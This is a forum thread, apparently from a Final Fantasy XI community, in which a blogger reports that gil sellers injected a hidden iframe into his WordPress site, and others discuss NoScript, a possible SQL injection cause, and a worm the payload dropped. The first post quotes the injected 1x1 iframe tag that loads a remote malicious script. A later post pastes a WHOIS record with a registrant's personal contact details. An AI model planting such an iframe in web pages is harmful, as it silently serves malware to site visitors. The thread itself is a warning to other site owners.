Item Search
     
BG-Wiki Search
+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 21
  1. #1
    Black Belt
    Join Date
    Jul 2004
    Posts
    5,744
    BG Level
    8
    FFXI Server
    Bahamut

    Gillsellers now going after wordpress blog

    I think this one is a lot bigger than ffxi.somepage etc since it was just one site. I was checking my website AVG popped up, along with IE with some remote access crap. Apparently now, gilsellers are targetting wordpress blogs. They sucessfully added an iframe to my linkshells blog. The code is the following.

    <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>

    IE7 (Vista) asked me if I wanted this code to run, I, ofcourse said no, Firefox does not prompt anything but request/sends data to s81.cnzz.com. When you go there, you have chinese webmasters something something ;w;

    http://i244.photobucket.com/albums/g...g?t=1198988409

    A lot of people use wordpress for blogs/ffxi related stuff so I recommend you guys check and see if anything is funny.

  2. #2
    Fake Numbers
    Join Date
    Nov 2005
    Posts
    85
    BG Level
    2

    Re: Gillsellers now going after wordpress blog

    My question is does this shit still do anything If you've got Noscript running? I'm pretty illiterate about this kind of stuff

  3. #3
    Banned.

    Join Date
    Oct 2006
    Posts
    10,159
    BG Level
    9

    Re: Gillsellers now going after wordpress blog

    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

  4. #4
    Black Belt
    Join Date
    Jul 2004
    Posts
    5,744
    BG Level
    8
    FFXI Server
    Bahamut

    Re: Gillsellers now going after wordpress blog

    Quote Originally Posted by Tajin
    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

    zigmals.com

    i haven't finished moving my webpage over and prob won't in a while.

  5. #5
    Fishing Guru
    Join Date
    Jan 2007
    Posts
    4,723
    BG Level
    7

    Re: Gillsellers now going after wordpress blog

    Quote Originally Posted by Tajin
    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18
    Im looking in adblock plus preferences (Tools>Adblock Plus) and I do not see anything about allowing or denying Iframes. Where exactly do I go to specify that I do not want iframes allowed?

  6. #6
    Pens win! Pens Win!!! PENS WIN!!!!!
    Join Date
    Dec 2005
    Posts
    7,504
    BG Level
    8
    FFXI Server
    Odin

    Re: Gillsellers now going after wordpress blog

    Are they just posting links in blogs? I'm confused.

  7. #7
    Fake Numbers
    Join Date
    Nov 2005
    Posts
    85
    BG Level
    2

    Re: Gillsellers now going after wordpress blog

    Quote Originally Posted by cdgreguh
    Quote Originally Posted by Tajin
    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18
    Im looking in adblock plus preferences (Tools>Adblock Plus) and I do not see anything about allowing or denying Iframes. Where exactly do I go to specify that I do not want iframes allowed?
    Noscript is a different Add-on, its not adblock

  8. #8
    Black Belt
    Join Date
    Jul 2004
    Posts
    5,744
    BG Level
    8
    FFXI Server
    Bahamut

    Re: Gillsellers now going after wordpress blog

    Quote Originally Posted by vagus
    Are they just posting links in blogs? I'm confused.
    no, i'm not exactly sure but I believe they're using a vulnerability in wordpress to do sql injections. I have to look over my mysql logs to see where exactly.

  9. #9
    Hydra
    Join Date
    Jan 2007
    Posts
    148
    BG Level
    3
    FFXI Server
    Cerberus

    Re: Gillsellers now going after wordpress blog

    http://wordpress.org/support/topic/134928 - some discussion about the bug; funny that the developers closed the bug report citing not enough info. It should be the developers' responsibility to reproduce this.

    Looks like the wp-stats-php.info guy deleted the file; it's zero bytes now, unless they're making it so that you can't get to it with wget/lynx/Firefox in Linux.

    http://www.popov-roman.com/blog/prog...statistics-gt/ - I can't read the website's language nor any of the websites to which it links, but looks like some discussion on this iframe exploit.

  10. #10
    Salvage Bans
    Join Date
    Jun 2007
    Posts
    936
    BG Level
    5
    FFXI Server
    Odin

    Re: Gillsellers now going after wordpress blog

    I've seen this on a lot of random sites, don't even know if they have anything to do with ffi, but yea i have them blocked via noscript v :nikkei:

  11. #11
    Sea Torques
    Join Date
    Jun 2006
    Posts
    654
    BG Level
    5
    FFXIV Character
    Aylin Celesse
    FFXIV Server
    Hyperion
    FFXI Server
    Fenrir
    WoW Realm
    Hellscream

    Re: Gillsellers now going after wordpress blog

    Do you use the public Wordpress hosting, or is your site hosted yourself on a private server?

    I have all my comments set to moderate, and I've gotten a bunch of gil-selling spam, which I promptly delete. I'm more concerned if this was done through comments or if they actually hacked and altered your coding on the actual page? My page is privately hosted, and if the latter is the case I need to contact my webhost admin (my ex-boyfriend -.-) to poke around and make things more secure for me.

  12. #12

    Re: Gillsellers now going after wordpress blog

    Domain ID:D22443415-LRMS
    Domain Name:WP-STATS-PHP.INFO
    Created On:22-Nov-2007 13:45:05 UTC
    Last Updated On:22-Nov-2007 13:45:07 UTC
    Expiration Date:22-Nov-2008 13:45:05 UTC
    Sponsoring Registrar:Gandi Sarl (R191-LRMS)
    Status:CLIENT TRANSFER PROHIBITED
    Status:TRANSFER PROHIBITED
    Registrant ID:O-901894-GANDI
    Registrant Name:No
    Registrant Organization:Ju Dehua
    Registrant Street1:B1/4F., No. 211, Taigu Road, Waigaoqiao Free Trade Zone[/b]
    Registrant City:Shanghai
    Registrant Postal Code:10079
    Registrant Country:CN CN = China's Country Code; Like USA = United States
    Registrant Phone:+86.2158681248
    Registrant Email:[email protected]
    Admin ID:C11388674-LRMS
    Admin Name:Ju Dehua
    Admin Street1:B1/4F., No. 211, Taigu Road, Waigaoqiao Free Trade
    Admin Street2:Zone
    Admin City:Shanghai
    Admin State/Province:
    Admin Postal Code:10079
    Admin Country:CN
    Admin Phone:+86.2158681248
    Admin Email:[email protected]


    Billing ID:C1249598-LRMS
    Billing Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
    Billing Organization:GANDI sarl
    Billing Street1:see also whois.gandi.net
    Billing Cityaris
    Billing Postal Code:F-75003
    Billing Country:FR
    Billing Email:[email protected]
    Tech ID:C1249598-LRMS
    Tech Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
    Tech Organization:GANDI sarl
    Tech Street1:see also whois.gandi.net
    Tech Cityaris
    Tech State/Province:
    Tech Postal Code:F-75003
    Tech Country:FR
    Tech Email:[email protected]
    Name Server:C.DNS.GANDI.NET
    Name Server:B.DNS.GANDI.NET
    Name Server:A.DNS.GANDI.NET


    Have at it. best I can do from work and nothing from Taj yet.
    EDIT>> Edited out blank fields.

  13. #13
    I Have The Clap Again
    Join Date
    Oct 2006
    Posts
    6,461
    BG Level
    8

    Re: Gillsellers now going after wordpress blog

    Yes, I visit some bahamut ls websites since it was my home when the game 1st came out and Ridexru's site always trys to run some crazy shit and my spyware starts blocking shit..I just figured it was a add on the mod wanted people to run but I never clicked it.

  14. #14
    Black Belt
    Join Date
    Jul 2004
    Posts
    5,744
    BG Level
    8
    FFXI Server
    Bahamut

    Re: Gillsellers now going after wordpress blog

    Quote Originally Posted by Bardlet
    Do you use the public Wordpress hosting, or is your site hosted yourself on a private server?

    I have all my comments set to moderate, and I've gotten a bunch of gil-selling spam, which I promptly delete. I'm more concerned if this was done through comments or if they actually hacked and altered your coding on the actual page? My page is privately hosted, and if the latter is the case I need to contact my webhost admin (my ex-boyfriend -.-) to poke around and make things more secure for me.

    its private.

  15. #15
    Cerberus
    Join Date
    Mar 2005
    Posts
    395
    BG Level
    4
    FFXI Server
    Leviathan

    Re: Gillsellers now going after wordpress blog

    I usually report malware sites to their ISP/datacenter, unless its in china.

    I dont even bother wasting my time on chinese sites

  16. #16
    New Odin
    Join Date
    Jul 2006
    Posts
    8,659
    BG Level
    8
    FFXIV Character
    Sparthia Abysseant
    FFXIV Server
    Excalibur
    FFXI Server
    Lakshmi

    Re: Gillsellers now going after wordpress blog

    Meh, where most of the attacks are originating from

  17. #17

    Re: Gillsellers now going after wordpress blog

    Quote Originally Posted by Aikar
    I usually report malware sites to their ISP/datacenter, unless its in china.

    I dont even bother wasting my time on chinese sites
    Yea it's why I posted it here.
    Pointless to report a site from China.

  18. #18
    Puppetmaster
    Join Date
    Jul 2007
    Posts
    58
    BG Level
    2
    FFXI Server
    Sylph
    WoW Realm
    Aegwynn

    Re: Gillsellers now going after wordpress blog

    If you run your own website and are concerned about security, one option you have is likely using a service like: http://www.trafficcleaner.com
    ...where you insert a bit of code onto your page and blocks the whole country of China.
    You might end up blocking a legit user in china in the process but those are very minimal :3

    You can also make your own custom list using a .htaccess file on your server and blocking off originating regions, like Shanghai.

  19. #19
    New Spam Forum
    Join Date
    Sep 2007
    Posts
    153
    BG Level
    3

    Re: Gillsellers now going after wordpress blog

    i unescaped the code best i could and came up with this:

    http://pastebin.com/mefb7452

    notice mscass.exe in there?

    http://www.trendmicro.com/vinfo/virusen ... YG&VSect=P

    Description:

    This worm may arrive via network shares.

    It searches the network for certain shares, into which it attempts to drop copies of itself.

    It takes advantage of software vulnerabilities to propagate across networks.

    It opens ports.

    It connects to IRC servers.

    It joins IRC channels.

    It executes commands from a remote malicious user.

    It steals sensitive information, such as user names and passwords, related to certain games.

    It terminates certain processes, if found running in memory.

  20. #20
    Puppetmaster
    Join Date
    Jul 2007
    Posts
    58
    BG Level
    2
    FFXI Server
    Sylph
    WoW Realm
    Aegwynn

    Re: Gillsellers now going after wordpress blog

    hmmm fix one thing and they attack using something else, persistent bunch.

Quick Reply Quick Reply

  • Decrease Size
    Increase Size
  • Remove Text Formatting
  • Insert Link Insert Image Insert Video
  • Wrap [QUOTE] tags around selected text
  • Insert NSFW Tag
  • Insert Spoiler Tag

Similar Threads

  1. AV on Carbi - got abandoned after 15min - AV now emo n/t
    By Lyramion in forum FFXI: Everything
    Replies: 33
    Last Post: 2006-02-20, 14:24
  2. um. servers go down just now?
    By Zigma in forum FFXI: Everything
    Replies: 32
    Last Post: 2004-09-16, 15:38